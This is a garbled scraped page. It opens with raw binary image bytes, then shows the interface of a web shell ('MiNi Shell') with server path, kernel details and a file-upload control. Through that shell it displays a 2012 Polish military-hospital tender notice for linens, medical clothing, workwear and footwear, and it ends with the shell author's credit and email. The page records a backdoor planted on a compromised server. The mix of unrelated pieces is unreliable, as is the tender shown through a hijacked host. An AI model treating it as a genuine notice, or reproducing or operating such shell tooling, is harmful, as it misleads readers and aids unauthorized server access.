JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120719/157437-N-2012.html

<p class="kh_header"><b>Ełk: Dostawa pościeli, bielizny, przedmiotów specjalnych, odzieży roboczej oraz obuwia roboczego na potrzeby Sekcji Mundurowej Numer sprawy: 27/2012-DZP/PNO.</b><br>
<b>Numer ogłoszenia: 157437 - 2012; data zamieszczenia: 19.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ , ul. Kościuszki 30, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 6219803, faks 087 6219807.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.108spzoz.elk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pościeli, bielizny, przedmiotów specjalnych, odzieży roboczej oraz obuwia roboczego na potrzeby Sekcji Mundurowej Numer sprawy: 27/2012-DZP/PNO..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE NR 1 POŚCIEL I BIELIZNA
Lp.	Nazwa  sprzętu	Ilość	J.M.
1	Poszwa na koc o wymiarach 210 x 160 Tkanina 100% bawełny, splot rządkowy o gramaturze conajmniej 180g/ m2 przy kurczliwości do 5%, temperatura prania 90 stopni, temperatura obróbki termicznej do 170 °C. Zakład minimum 30 cm. Kolor biały.	85	szt.
2	Poszewka na poduszkę o wymiarach 90 x 80 Tkanina 100% bawełny, splot rządkowy o gramaturze conajmniej 180g/ m2 przy kurczliwości do 5%, temperatura prania 90 stopni, temperatura obróbki termicznej do 170 °C. Zakład minimum 20 cm. Kolor biały.	70	szt.
3	Poszewka na podgłówek o wymiarach 70 x 50 Tkanina 100% bawełny, splot rządkowy o gramaturze conajmniej 180g/ m2 przy kurczliwości do 5%, temperatura prania 90 stopni, temperatura obróbki termicznej do 170 °C. Zakład minimum 20 cm. Kolor biały.	20	szt.
4	Ręcznik frotte dwustronny o wymiarach min. 100 x 50 cm. Bawełna 100% o gramaturze nie mniejszej niż 160g/m2 - jednostronie (320g/m2 dwustronnie) przy kurczliwości do 5%, temperatura prania 90 °C, temperatura obróbki termicznej do 120 °C	70	szt.
5	Piżama męska flanelowa (długie rękawy) - bluza i spodnie - w różnych rozmiarach wg zamówień Bawełna 100% o gramaturze nie mniejszej niż 160g/m2 przy kurczliwości do 5%, temperatura prania 90 °C temperatura obróbki termicznej do 170 °C.Dostawy powinny zapewnić możliwość łączenia w komplety piżam z różnych dostaw.	30	szt.
6	Koszula nocna damska w różnych rozmiarach wg zamówień Bawełna 100% o gramaturze nie mniejszej niż 160g/m2 przy kurczliwości do 5%, temperatura prania 90 °C temperatura obróbki termicznej do 170 °C.	20	szt.







ZADANIE NR 2 ODZIEŻ MEDYCZNA
Lp.	Nazwa  sprzętu	Ilość 	J. M.
1	Fartuch barierowy operacyjny zielony wielokrotnego użytku, standardowego ryzyka, wykonany zgodnie z normą PN-EN 13795 o zróżnicowanej grubości tkaniny, w polu krytycznym fartucha (przód i rękawy) o gramaturze 110 - 135 g/m2, poza obszarem krytycznym tkanina o gramaturze do 85 g/m2 , wykonany z tkaniny polestrowej z dodatkiem włókna węglowego, tkanina nieteflonowana, nieimpregnowana. Fartuch wiązany z tyłu na troki - poły zakładane na siebie, szew łączący poszczególne elementy fartucha kryty, zawijany dwugłowy, stębnowany, rękawy wykończone elastycznym ściągaczem. Temperatura prania 75 °C Temperatura sterylizacji 134 °C	70	szt.
2	Ubranie chirurga zielona operacyjna wielokrotnego użytku, wykonana z niepylącej, oddychającej tkaniny bawełniano - poliestrowej o zawartości bawełny powyżej 50% i gramaturze max.130g/m2, posiadająca antystatyczną nitkę węglową. Bluza w serek - dwie kieszenie naszywane w dolnej części. Spodnie z gumką wiązane z przodu na troki kurczliwość max. 3%. Barwnik odporny na działanie chloru. Temperatura prania 95 °C. Wymagane badanie potwierdzające pylenie na poziomie określonym w normie PN-EN 13795 	70	kpl
3	Spodnie chirurga zielone operacyjne wielokrotnego użytku, wykonane z niepylącej, oddychającej tkaniny bawełniano - poliestrowej o zawartości bawełny powyżej 50% i gramaturze max.130g/m2, posiadająca antystatyczną nitkę węglową. Spodnie z gumką wiązane z przodu na troki kurczliwość max. 3%. Barwnik odporny na działanie chloru. Temperatura prania 95 °C. Wymagane badanie potwierdzające pylenie na poziomie określonym w normie PN-EN 13795 	40	szt.
4	Ubranie lekarza w różnych rozmiarach wg zamówienia bluza zapinana z trzema kieszeniami - jedna górna i dwie dolne, kołnierz z klapką, rękaw krótki, długi.
Spodnie męskie, proste z kieszeniami, w pasie regulacja gumą. Elanobawełna 160g. Kolor Biały. 	70	kpl
5	Garsonka pielęgniarki w różnych rozmiarach wg zamówień, z krótkim i długim rękawem, żakiet posiada trzy kieszenie, spodnie na pasku i gumce. Elanobawełna 160g. Kolor Biały. 	350	kpl
6	Fartuch roboczy w różnych rozmiarach wg zamówień, z krótkim i długim rękawem,  trzy kieszenie. Elanobawełna 160g. Kolor Biały. 	150	szt.


ZADANIE NR 3 ODZIEŻ ROBOCZA

Lp.	Nazwa  sprzętu	Ilość 	J.M.
1	Ubranie robocze w różnych rozmiarach wg zamówień - spodnie ogrodniczki kolor granatowy, nogawki proste, szelki zapinane na klamry, bluza z kieszeniami z długim rękawem rozpinana.	4	kpl
2	Kurtka robocza zimowa w różnych rozmiarach wg zamówień - ocieplana, rozpinana, kolor granatowy, 	5	szt.
3	Koszula flanelowa w różnych rozmiarach wg zamówień w kratę w różnych rozmiarach wg zamówień, kolor krata granatowa	4	szt.
4	Rękawice robocze pięciopalcowe w różnych rozmiarach wg zamówień wykonane z dzianiny  poliestrowej z jednostronnym nakropieniem. - nakropienie z PCV na części dłonicowej zapewnia dobrą chwytność podczas przenoszenia, odporne na rozdarcie.	71	para
5	Czepek kucharski z daszkiem siateczka, kolor biały	12	szt.
6	Czapka ocieplana zimowa wywijana w różnych rozmiarach wg zamówień, Kolory ciemne	2	szt.
7	Rękawice robocze ocieplane zimowe pięciopalcowe w różnych rozmiarach wg zamówień	7	szt.
8	Czapka robocza w różnych rozmiarach wg zamówień letnia 100 % bawełna 	11	szt.
9	Ochronniki słuchu z dwóch czasz tłumiących, które obejmują małżowiny uszne i przylegają do głowy miękkimi poduszkami uszczelniającymi wypełnionymi pianką	3	szt.
10	Płaszcz - kurtka przeciw deszczowa w różnych rozmiarach wg zamówień, z kapturem nieprzepuszczająca wody	4	szt.
11	Okulary ochronne zakładane na elastyczną gumę, z możliwością regulacji jej długości	5	szt.













ZADANIE NR 4 OBUWIE MEDYCZNE I ROBOCZE

Lp.	Nazwa  sprzętu	Ilość przeglądów w ciągu roku	J.M.
1	Obuwie specjalistyczne w różnych rozmiarach wg zamówień na spodach przeciwpoślizgowych z profilem ortopedycznym i cholewka skórzaną. Wyściółka z materiałów o podwyższonej odporności na działania wilgoci, specjalny protektor antypoślizgowy, pasek dwufunkcyjny przekładany na piętę, cholewka gładka lub z dziurkami. Podeszwy odporne na oleje, tłuszcze roślinne i zwierzęce.	55	para
2	Pantofle służby zdrowia damskie w różnych rozmiarach wg zamówień, z cholewką i wyściółką skórzaną regulacją tęgości, spody na koturnie, przeciwpoślizgowe z profilem ortopedycznym, podeszwy odporne na oleje, tłuszcze roślinne i zwierzęce, do wybory sandały i cholewka z dziurkami	195	para
3	Trzewiki robocze skórzane w różnych rozmiarach wg zamówień sięgające kostki sznurowane w różnych rozmiarach wg zamówień. Kolor czarny	8	para
4	Sandały antypoślizgowe damskie w różnych rozmiarach wg zamówień z cholewką i wyściółką skórzaną z paskiem na piętę, regulacja tęgości, spody przeciwpoślizgowe z profilem ortopedycznym, podeszwy odporne na oleje, tłuszcze roślinne, zwierzęce. Cholewka z dziurkami.	6	para
5	Buty filcowo-gumowe w różnych rozmiarach wg zamówień, izolacja spodu od zimna	2	para

33199000-1	Odzież medyczna
18830000-6	Obuwie ochronne
39512100-5	Prześcieradła
39512500-9	Poszewki na poduszki
39518000-6	Bielizna szpitalna.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1, 18.83.00.00-6, 39.51.21.00-5, 39.51.25.00-9, 39.51.80.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca wraz z ofertą zobowiązany jest złożyć dokumenty nie wymienione powyżej: 1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę  2) Formularze cenowe w zakresie Zadań Nr 1 - 4  3) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem postanowień w art. 144 ust. 1 Ustawy Prawo Zamówień Publicznych:
1.	Zamawiający dopuszcza możliwość zmiany cen w zakresie ich obniżenia w trakcie trwania umowy.
2.	Zamawiający w trakcie realizacji umowy może dokonać przesunięć ilościowych asortymentu, według bieżących potrzeb i celowości zakupu, przy czym ogólna wartość przedmiotu zamówienia nie przekroczy kwoty zapisanej w umowie. 
3.	Zamiany w zakresie danych dotyczących stron.
4.	Zamawiający dopuszcza zmianę ceny w przypadku zmiany przepisów prawa podatkowego w okresie obowiązywania umowy dotyczących stawek VAT, przy czym zmiana nastąpi w wartości brutto, wartość netto pozostaje bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.108spzoz.elk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ 
Ul. Kościuszki 30
19-300 Ełk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2012 godzina 09:30, miejsce: 108 Szpital Wojskowy z Przychodnią SP ZOZ 
Ul. Kościuszki 30
19-300 Ełk
Pokój nr 22 - Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 27.08.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com